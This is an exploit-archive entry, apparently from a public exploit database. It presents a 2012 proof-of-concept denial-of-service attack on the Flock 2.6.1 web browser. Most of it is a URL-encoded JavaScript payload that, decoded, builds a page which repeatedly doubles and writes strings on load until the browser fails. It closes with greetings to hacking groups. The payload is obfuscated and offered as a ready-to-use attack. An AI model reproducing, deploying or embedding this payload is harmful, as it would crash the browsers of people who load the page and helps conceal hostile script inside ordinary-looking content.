Flock version 2.6.1 suffers from a denial of service vulnerability.
a3fc59b92ec9778624cecbf9978cf792908c9fdec5a5a5a97851a4c0d3d4211f
# Exploit Title: Flock 2.6.1 DoS
# Date: 29/03/2012
# Author: r45c4l
# Email: infosecpirate@gmail.com
# Product url: http://flock.en.softonic.com/
# Version: 2.6.1
# CVE : ()
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Product Description :
Flock was a web browser that specialized in providing social networking and Web 2.0 facilities built into its user interface.Earlier versions of Flock used the Gecko HTML rendering engine by Mozilla. (Wikipedia)
Product Cost : N/A
=================Exploit=================================================
---ICW---
[ EXPL0!T ]
p0c -
<script type="text/javascript">
<!--
document.write(unescape('%3c%68%74%6d%6c%3e%0d%0a%3c%74%69%74%6c%65%3e%4f%6f%70%73%20%75%72%20%62%72%6f%77%73%65%72%20%6a%75%73%74%20%64%69%65%64%20%21%21%3c%2f%74%69%74%6c%65%3e%0d%0a%3c%68%65%61%64%3e%0d%0a%3c%73%63%72%69%70%74%3e%0d%0a%66%75%6e%63%74%69%6f%6e%20%46%54%42%28%29%0d%0a%20%7b%0d%0a%20%20%20%20%76%61%72%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%31%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%34%31%34%31%25%75%34%31%34%31%22%29%3b%0d%0a%20%20%20%20%76%61%72%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%32%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%34%32%34%32%25%75%34%32%34%32%22%29%3b%0d%0a%20%20%20%20%76%61%72%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%33%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%34%33%34%33%25%75%34%33%34%33%22%29%3b%0d%0a%20%20%20%20%76%61%72%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%34%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%34%34%34%34%25%75%34%34%34%34%22%29%3b%0d%0a%20%20%20%20%66%6f%72%28%69%3d%30%3b%20%69%20%3c%3d%20%31%30%30%20%3b%20%2b%2b%69%29%0d%0a%20%7b%0d%0a%20%20%20%20%20%20%20%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%31%2b%3d%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%31%3b%0d%0a%20%20%20%20%20%20%20%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%32%2b%3d%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%32%3b%0d%0a%20%20%20%20%20%20%20%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%33%2b%3d%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%33%3b%0d%0a%20%20%20%20%20%20%20%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%34%2b%3d%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%34%3b%0d%0a%20%20%20%20%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%31%29%3b%0d%0a%20%20%20%20%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%32%29%3b%0d%0a%20%20%20%20%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%33%29%3b%0d%0a%20%20%20%20%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%34%29%3b%0d%0a%20%20%20%20%7d%0d%0a%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%31%29%3b%0d%0a%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%32%29%3b%0d%0a%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%33%29%3b%0d%0a%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%34%29%3b%0d%0a%7d%0d%0a%3c%2f%73%63%72%69%70%74%3e%0d%0a%3c%2f%68%65%61%64%3e%0d%0a%3c%62%6f%64%79%20%6f%6e%4c%6f%61%64%3d%22%46%54%42%28%29%22%3e%0d%0a%3c%2f%62%6f%64%79%3e%0d%0a%3c%2f%68%74%6d%6c%3e'));
//-->
</script>
===========================================================================
Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0, Hoody, sam, Cyber Kalki
All members of ICW, AH and G4H, and all Indian Hackers
Special Greetz to : b4ltazar and s1nn3r_01
=== End () ====